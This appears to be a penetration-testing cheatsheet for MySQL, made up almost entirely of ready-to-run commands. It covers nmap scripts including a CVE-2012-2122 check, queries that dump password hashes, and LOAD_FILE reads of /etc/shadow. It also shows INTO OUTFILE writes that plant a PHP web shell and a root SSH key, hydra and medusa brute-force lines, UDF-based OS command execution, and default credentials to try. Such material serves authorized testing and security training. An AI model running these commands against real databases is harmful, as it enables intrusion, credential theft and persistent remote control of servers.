MySQL Enumeration Cheatsheet

Default Port: 3306 (TCP)

nc -nv <ip> 3306                             # Banner grab
mysql -u root -h <ip>                        # No password
mysql -u root -p -h <ip>                     # Prompt for password
mysql -u root -p<password> -h <ip>           # Inline password (no space)
mysql -u root -h <ip> -e "SELECT version();" # One-liner query

Nmap Scripts

nmap -p 3306 --script mysql-info <ip>
nmap -p 3306 --script mysql-databases \
  --script-args mysqluser=root,mysqlpass='' <ip>
nmap -p 3306 --script mysql-empty-password <ip>
nmap -p 3306 --script mysql-brute <ip>
nmap -p 3306 --script mysql-audit <ip>
nmap -p 3306 --script mysql-vuln-cve2012-2122 <ip>
nmap -p 3306 --script mysql-* <ip>             # All MySQL scripts

Enumeration Queries

-- Version and environment
SELECT version();
SELECT @@version;
SELECT user();
SELECT @@datadir;
SELECT @@basedir;
SELECT @@hostname;

-- Databases and tables
SHOW databases;
USE <database>;
SHOW tables;
DESCRIBE <table>;
SELECT * FROM <table> LIMIT 5;
SELECT table_schema, table_name FROM information_schema.tables;

-- Users and privileges
SELECT user, host, authentication_string FROM mysql.user;
SELECT user, host, password FROM mysql.user;         -- older MySQL
SELECT * FROM information_schema.user_privileges;
SHOW GRANTS FOR '<user>'@'<host>';
SHOW GRANTS FOR CURRENT_USER();

-- Check FILE privilege
SELECT user, host, File_priv FROM mysql.user;

File Read / Write (Requires FILE Privilege)

-- Read files
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/etc/shadow');
SELECT LOAD_FILE('C:/Windows/System32/drivers/etc/hosts');

-- Write files (web shell)
SELECT '<?php system($_GET["cmd"]); ?>'
  INTO OUTFILE '/var/www/html/shell.php';

-- Write SSH key
SELECT 'ssh-rsa AAAA...' INTO OUTFILE '/root/.ssh/authorized_keys';

Brute Force

hydra -l root -P wordlist.txt mysql://<ip>
hydra -L users.txt -P wordlist.txt mysql://<ip>
medusa -h <ip> -u root -P wordlist.txt -M mysql

User-Defined Functions (UDF) for Privilege Escalation

-- Check if plugin dir is writable (post-login)
SHOW variables LIKE 'plugin_dir';

-- Drop malicious UDF .so/.dll into plugin dir,
-- then create the function and execute OS commands
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id > /tmp/out');

Common Credentials to Try

root : (blank)
root : root
root : password
root : mysql
root : toor
admin : admin

MySQL Enumeration Cheatsheet#

Connection & Banner Grabbing#

Nmap Scripts#

Enumeration Queries#

File Read / Write (Requires FILE Privilege)#

Brute Force#

User-Defined Functions (UDF) for Privilege Escalation#

Common Credentials to Try#

MySQL Enumeration Cheatsheet

Connection & Banner Grabbing

Nmap Scripts

Enumeration Queries

File Read / Write (Requires FILE Privilege)

Brute Force

User-Defined Functions (UDF) for Privilege Escalation

Common Credentials to Try